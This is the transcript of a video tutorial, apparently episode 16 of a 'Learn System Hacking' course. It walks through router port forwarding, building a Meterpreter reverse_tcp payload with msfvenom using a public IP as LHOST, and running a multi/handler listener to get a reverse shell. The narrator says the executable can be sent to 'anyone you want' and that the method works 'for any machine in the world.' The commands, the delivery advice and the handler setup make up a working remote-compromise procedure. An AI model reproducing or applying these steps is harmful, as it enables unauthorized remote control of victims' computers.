Learn System Hacking E16: Meterpreter Over Internet with Port Forwarding


Hello everybody and welcome back. Now in the previous videos we have seen some of the post exploitation modules that we
can run against the target. Now those are just some of them. You can run basically
a bunch of others as well which we will not cover, since there is no time for
that. If you want to you can check them out at the Metasploit modules basically
directory. Or you can just search post in the Metasploit framework console command. If you just open it right here with this, I will open it since we will need it
since in this video I will show you how you can do the attack over the Internet.
But before I do that, let me just show you how you can search all of the post
exploitation modules. Now basically once this opens you just search post/windows, and it will give you all of the post exploitation modules that
you can use on Windows. So just type here search post/windows and it should
print out all of the, let me just zoom it out once again, all of the modules that
you can use on Windows. These are all post exploitation modules as it says
right here with post, and you can use them if you want to. For example, this
could be interesting to you if you wanted to check out the USB history.
So we, for example, know that the USB that we plugged in before should
appear in there. Now I don’t have a session open so I won’t be running that
exploit, but you can check it out if you wanted to. But more about that later on.
What we want to do right now is perform our port forwarding in order to be able
to do this attack on any PC in the world. So, how do we do port forwarding? Well, open up your Firefox. You will need to access your router, so you need to know your
routers username and password and enter it. And after you do that, basically, you
can just find the port forwarding section, so let me just show you. You just enter your routers IP, in my case my routers IP is .1.1, and I just click
on it. It will prompt me with a login screen, so I just type my username
and password. We do not want to save it. And now since everyone’s router is
different, what you want to find in your router is basically the port
forwarding section. Now I’m not even sure where it is in mine. It should be somewhere in the, not wireless, it could be in the NAT. So NAT port forwarding, I found mine. And here you have a set of rules that you want to specify in order to perform port forwarding. So rule index, not really that important. Application, not important. What is important is the, well this isn’t really…no, not this thing. The protocol
under that is important. So you want to send TCP right here. The start port
number you want to set to the port that you want to forward. So let’s say we want
to forward 5555, and port number should also be 5555. Local IP address is the IP address of your Kali Linux machine.
Which currently if I run ifconfig is, let me just find it… is .1.4. So, we just type here your
local IP address, you check it out with the ifconfig command,
and then you specify it in the local IP address. Then the start port local can
also be 5555 since these are the same options as well as
the previous ones, which are the start and the end port. So once you select the
port number that you want to port forward on your local machine, and the IP
address of your local machine as we can see right here, what you want to click on
is submit, or basically whatever it says for you. So once we submit we can see
that right now I successfully made the port forward for this IP address on this
port, which is good. Right now that we port forward it the only thing you want
to do right now, which is different from the previous attacks, is basically change
the IP address of the local host in the MSFvenom payload creation into the
global IP address. Or basically into your public IP address right here. So if
you just type here what is my IP, it will print out what is your public IP
address. As it says right here, which currently for me is this one. And the only thing you need to do is specify in your payload creation, instead of
the LHOST to be your local IP address, which is .1.4, you want to specify
this IP address right here. So let me show you how to do that. If you just go right here, change to root, we check the working directory and
we create the payload. So, msfvenom -p We want to use the same payload as before, so meterpreter/reverse_tcp. And
right here LHOST=, instead of specifying local IP address what we want to paste is your public IP address right here. The LPORT, you want to set the
LPORT to the port that you forwarded, which in our case is 5555. In your case if you specify the different port, just use the different port
instead. So LPORT=5555 and then after that we specify everything the same. So file .exe, and then we want to specify it
to be, let’s say mine shall wanshell.exe. So we wait for this to create our own
payload. And after it creates this payload what you can do is, basically, you
can send it to anyone you want. You can send it basically to a different
continent on some other PC. And what that PC will do is it will perform a public IP
connection, and it will try to connect to this IP on this port. And our
router, since it has a rule that this port is forwarded to the .1.4
local IP address, will forward this connection to our Kali Linux machine. So
now if I type here ls we can see that the wanshell.exe is created, and
all I want to do is plug in my USB Drive. So, Kingston DataTraveler, or you can actually do it over Apache2 if you want to. It doesn’t really matter. And what I want to
do is cp wanshell.exe… we’ll just do it like this. Since I need to specify it in a regular terminal, so what
I want to do is basically copy wanshell.exe into my USB Drive. You can do it manually or you can do it with the command like this. And now we have our
wanshell here. So, after we do that we just turn off the USB Drive, we unmount it. We also uncheck it right here so it goes to connect to our
Windows 10 machine. And after that what we want to do, let me just see if it will
pop up right here of if I have to replug it in. So let me do it like this. It is not popping up, it doesn’t matter.
What we will do is we will just go right here, and here is the wanshell. I
put it on my desktop and what I want to do is basically
specify a listener right now. Same as before. So we use, use exploit/multi/handler, set payload to windows/ x64/meterpreter/reverse_tcp. Now
I’m going over this fast since I already covered it. Whoops, I made a typo. And now show options. We can see everything is set except the LHOST. So, set LHOST to be your local IP address right here. And what you want to do is
just type here exploit -j -z. It will run it in the background. And if we run this
right here, you will see that in a few seconds we will get a reverse shell back. Oops, the reason why we are not getting
it, I just noticed right now, is because I
specified right here the LPORT to be 4444, instead it to be 5555 which is specified in the port forwarding
rules. So let us do this once again. Use exploit/multi/handler. Let me just see
jobs. So I kill this job that I ran, so I killed the first listening on point 4444. And I show my options. Let’s see if everything is set, and now
we want to change the LPORT to be 5555. So, now that we did all that, now we can exploit -j -z. We can run the meterpreter, or pardon me run the listening, and now if we run this we get the connection
from our windows 10 machine. And now this will work for any machine in the world. So, basically, wherever that machine is it
will be able to connect to you, since we port forwarded our port to router. And we
can see right now we are not even getting the connection from a local IP,
we are getting the connection from the public IP. As we can see if I go sessions
-i 1, get userid, we can see that we successfully were able to exploit a
target machine that is not on our local network. Even though my windows 10 machine really is, but the process is looking like this. So with this process you will be able to connect to any machine in the world. So that would be
about it for this tutorial. I hope you enjoyed it and I hope I see you in the
next one. Bye!

4 Comments

Add a Comment

Your email address will not be published. Required fields are marked *